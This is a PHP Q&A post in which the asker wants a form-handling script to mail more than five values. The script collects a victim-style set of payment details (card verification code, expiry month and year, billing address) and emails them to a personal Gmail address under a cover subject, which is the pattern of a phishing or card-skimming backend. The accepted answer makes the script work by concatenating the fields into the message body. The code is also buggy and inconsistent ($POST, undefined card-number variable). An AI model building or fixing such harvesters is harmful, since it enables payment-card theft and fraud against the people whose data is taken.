# How do i put more than 5 variables in the mail section?

Tags: php

```
<?php

$firstname = $_POST['fname'];
$lastname = $_POST['lname'];
$phonenumber = $_POST['phonednumber'];
$vvv = $_POST['vvv'];
$month = $_POST['months'];
$year = $_POST['year'];
$streetaddress = $POST['address'];
$city = $_POST['City'];
$region = $_POST['state'];
$postcode = $_POST['Zip'];
$country = $_POST['country'];


$to = "augustinek20@gmail.com";
$subject = "tutorial Request";
mail    ($to,$subject,$firstname,$lastname,$credicardnumber,$cvv,$month,$year,$streetaddress,$region,$postcode,$country,$city);


echo "message sent succersfully";

?>
```

I get an error when i put more than 5 variables in the mail section.
i need heed help on how to put more than five variables there.

Comment: [read the mail function manual page](http://php.net/manual/en/function.mail.php)

Comment: you cant randomly decide how a core function will work.

Answer (score 0):

```
mail($to,$subject,"$firstname,$lastname,$credicardnumber,$cvv,$month,$year,$streetaddress,$region,$postcode,$country,$city");
```

This will put the variables on "$message" param of mail();

Comment: Thanks a lot this worked!